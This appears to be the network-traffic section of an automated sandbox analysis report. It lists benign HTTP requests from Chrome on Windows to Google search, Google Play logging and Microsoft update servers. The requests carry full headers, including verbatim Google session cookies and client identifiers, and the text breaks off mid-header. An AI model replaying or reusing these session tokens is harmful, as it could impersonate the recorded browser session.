NID=517=6KcQD-DCOfwRwfuOQLqsCzAUJU8k-iB9YwwFvcmpYUrmT-aHqe4PSNibvvpIkBpozbJIJI-v9_gESduPkkQlck55ADmg5cE9fHUaLwta4beFwdGVUm5zcL1RSzLKJg-VgLu4GE6dK63vW0eMz5cLTFXR7tT0ATtzr7WhodeQZxheX1xtXdL_83w649qhq4-0ZM-Ufd-SBZ6X
Source: global traffic	HTTP traffic detected: GET /xjs/_/ss/k=xjs.hd.3K9kqFG9IbE.L.B1.O/am=JCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAACAAAAAAAAAAUADsJAABGAAAbABAAAAAAAAIAgAEAAAAAACABAAAAAmABAAAAAAACABAJAACgCAAAAIBACBAAgAAKIAQoQAIEiiAUAgAAAAMAAIQAMMAwAEEFAKMAAQAAAAAAECACAACAIwABAgD0EAgAA4E0AQAQAnoAAgAAAEAAAAEgAAAMgAEyAAEAAAAAAABkAAAAAAAAAAAAAAAAAAAAAAAAAACAACAAoAAAAAAAAAAAAAAAAAAAAAAC/d=0/br=1/rs=ACT90oEAN8vKHPrZc1uQQW97laV6I-0P2A/m=syjv,syo3?xjs=s4 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=6KcQD-DCOfwRwfuOQLqsCzAUJU8k-iB9YwwFvcmpYUrmT-aHqe4PSNibvvpIkBpozbJIJI-v9_gESduPkkQlck55ADmg5cE9fHUaLwta4beFwdGVUm5zcL1RSzLKJg-VgLu4GE6dK63vW0eMz5cLTFXR7tT0ATtzr7WhodeQZxheX1xtXdL_83w649qhq4-0ZM-Ufd-SBZ6X
Source: global traffic	HTTP traffic detected: GET /async/hpba?vet=10ahUKEwiHxL-h_OCIAxVy2AIHHQM3AsYQj-0KCBY..i&ei=64P1ZseiHfKwi-gPg-6IsAw&opi=89978449&yv=3&sp_imghp=false&sp_hpte=1&sp_hpep=1&stick=&cs=0&async=_basejs:%2Fxjs%2F_%2Fjs%2Fk%3Dxjs.hd.en.UzAaLIOvKPw.es5.O%2Fam%3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s%2Fdg%3D0%2Fbr%3D1%2Frs%3DACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA,_basecss:%2Fxjs%2F_%2Fss%2Fk%3Dxjs.hd.3K9kqFG9IbE.L.B1.O%2Fam%3DJCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAACAAAAAAAAAAUADsJAABGAAAbABAAAAAAAAIAgAEAAAAAACABAAAAAmABAAAAAAACABAJAACgCAAAAIBACBAAgAAKIAQoQAIEiiAUAgAAAAMAAIQAMMAwAEEFAKMAAQAAAAAAECACAACAIwABAgD0EAgAA4E0AQAQAnoAAgAAAEAAAAEgAAAMgAEyAAEAAAAAAABkAAAAAAAAAAAAAAAAAAAAAAAAAACAACAAoAAAAAAAAAAAAAAAAAAAAAAC%2Fbr%3D1%2Frs%3DACT90oEAN8vKHPrZc1uQQW97laV6I-0P2A,_basecomb:%2Fxjs%2F_%2Fjs%2Fk%3Dxjs.hd.en.UzAaLIOvKPw.es5.O%2Fck%3Dxjs.hd.3K9kqFG9IbE.L.B1.O%2Fam%3DJCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAACAAAAAAAAEAUoDsJAABGAQAbABAAAAAAAAIAgAEAAYIAACIBAAABAnABABAIAIACABEJAICgCcCjTIBACBAmgAAKIAQoQAIEiiAUIgAAAAMAAIQAMMAwAEEFAKMAAQAAAAAAECACACCAYwABAgD0EAgAA4E0AQAQAnoAAgAAAEAAQAEggAANgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s%2Fd%3D1%2Fed%3D1%2Fdg%3D0%2Fbr%3D1%2Fujg%3D1%2Frs%3DACT90oFp4gBNGXk7N4F5TdcKKkHmQCd2hQ,_fmt:prog,_id:_64P1ZseiHfKwi-gPg-6IsAw_8 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=0/dg=0/br=1/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA/m=aLUfP?xjs=s4 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
Source: global traffic	HTTP traffic detected: GET /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=0/dg=0/br=1/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA/m=sy1em,P10Owf,sy1de,sy1dc,syr0,gSZvdb,sy10q,sy10p,WlNQGd,syr5,syr2,syr1,syqz,DPreE,sy112,sy110,nabPbb,sy10k,sy10i,syjv,syo3,CnSW2d,kQvlef,sy111,fXO0xe?xjs=s4 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
Source: global traffic	HTTP traffic detected: GET /logos/2024/popcorn/rc4/preload-bg-sprite.jpg HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=0/dg=0/br=1/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA/m=lOO0Vd,sy8s,P6sQOc?xjs=s4 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=SBWgPo8m6MLKgX2&MD=VCxfKomC HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /logos/2024/popcorn/rc4/google_frame_mask.png HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: imageReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=0/dg=0/br=1/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA/m=aLUfP?xjs=s4 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=0/dg=0/br=1/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA/m=lOO0Vd,sy8s,P6sQOc?xjs=s4 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /gen_204?atyp=i&ct=psnt&cad=&nt=navigate&ei=64P1ZseiHfKwi-gPg-6IsAw&zx=1727366130436&opi=89978449 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
Source: global traffic	HTTP traffic detected: GET /logos/2024/popcorn/rc4/google_frame_mask.png HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
Source: global traffic	HTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; 